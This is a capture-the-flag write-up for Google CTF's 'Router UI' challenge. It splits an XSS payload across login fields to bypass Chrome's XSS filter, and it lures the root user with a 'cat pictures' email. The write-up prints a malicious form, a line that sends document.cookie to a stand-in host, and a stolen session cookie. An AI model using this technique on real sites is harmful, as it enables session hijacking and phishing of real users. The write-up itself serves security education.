Google CTF: Beginners Quest - Router UI
February 8, 2019
Using the domain found on the hardened aluminum key, you make your way on to the OffHub router. A revolutionary device that simplifies your life. You’re at the UI page, but attempting to brute force the password failed miserably. If we could find an XSS on the page then we could use it to steal the root user session token. In case you find something, try to send an email to firstname.lastname@example.org. If you claim your link includes cat pictures, I’m sure Wintermuted will click it. I hope Chrome’s XSS filter will not block the exploit though.
In this challenge, we are shown a login form and need to find a way to steal the session token from the root user. We’re given a hint about finding XSS somewhere on the page, but Chrome’s XSS filter makes this a bit more difficult. Once we find a way to bypass this filter, we can send off an email to the root user containing a link and hope that they’ll click it. From the challenge description, if we say the link has cat pictures, there’s a good chance they’ll do exactly that.
You can see the XSS filter in action by inputting something like
<script>alert('XSS');</script> in one of the fields and submitting it. You should get an
ERR_BLOCKED_BY_XSS_AUDITOR error. If we put some legit values, let’s say
password, into the login form and submit it, we’re shown a page that states
Wrong credentials: user//password
Something of note here is that
// is being used to separate the username and password. We can use this to our advantage to bypass Chrome’s XSS filter. In particular, we’ll use the
// to help us craft a URL. To show what I mean, go back to the login form and set the username to
http: and the password to
example.com and then submit it.
Wrong credentials: http://example.com
BOOM! We can craft ourselves a URL. This by itself isn’t all that useful. But we can take advantage of this by inputting a script into this field that loads a JS file, hosted by us, that will send the user’s cookie to us. The script we’ll end up using looks something like this:
But of course, we can’t just pass that into the form, we’ll trigger the XSS filter. But by splitting it between the username and password fields as we did earlier, we can execute our own scripts. Here are the values we’ll be using:
username = <script src="https:
password = yourwebsite.com/cookie.js"></script>
We have a way to attack the root user, now we just need them to submit a form with these values in it. To accomplish this, we’ll first need to set up a website that handles this. Then we can email the link to them in hopes they’ll click it.
NOTE: The website must have an SSL certificate. An easy way to do this is to use Heroku to host the website.
We only need two files for this, a
password fields, set to our payload above, to the login form on
https://router-ui.web.ctfcompetition.com/login. When submitted, our script will be loaded, thus sending the user’s cookies to us.
<html> <head></head> <body> <form name="login" class="form-signin" action="https://router-ui.web.ctfcompetition.com/login" method="post"> <h1 class="h3 mb-3 font-weight-normal">OffHub Management Interface</h1> <input type="text" name="username" class="form-control" placeholder="username" value="<script src='https:"> <input type="password" name="password" class="form-control" placeholder="password" value="yourwebsite.com/cookie.js'></script>"> <button class="btn btn-block" type="submit">Sign in</button> </form> </body> </html>
document.location = 'https://yourwebsite.com/cookie.html?' + document.cookie;
With the website set up, all we have to do now is send an email to
email@example.com containing a link to
https://yourwebsite.com. To play along with the challenge description, we should also set the subject line of the email to
Once the email is sent off, you should receive a confirmation within a few seconds. Watch your server logs and you’ll see a request was made that includes some cookies. It’ll look something like
GET /cookie.html?flag=Try%20the%20session%20cookie;%20session=Avaev8thDieM6Quauoh2TuDeaez9Weja HTTP/1.1
Looks as if the root user had two cookies:
flag=Try the session cookie
If we enter these cookies into our browser and navigate to
https://router-ui.web.ctfcompetition.com/, we’ll be greeted with the dashboard. On this page, the first thing that jumps out at me are the two credential fields. If we look at either one of those values, we can see it contains the flag: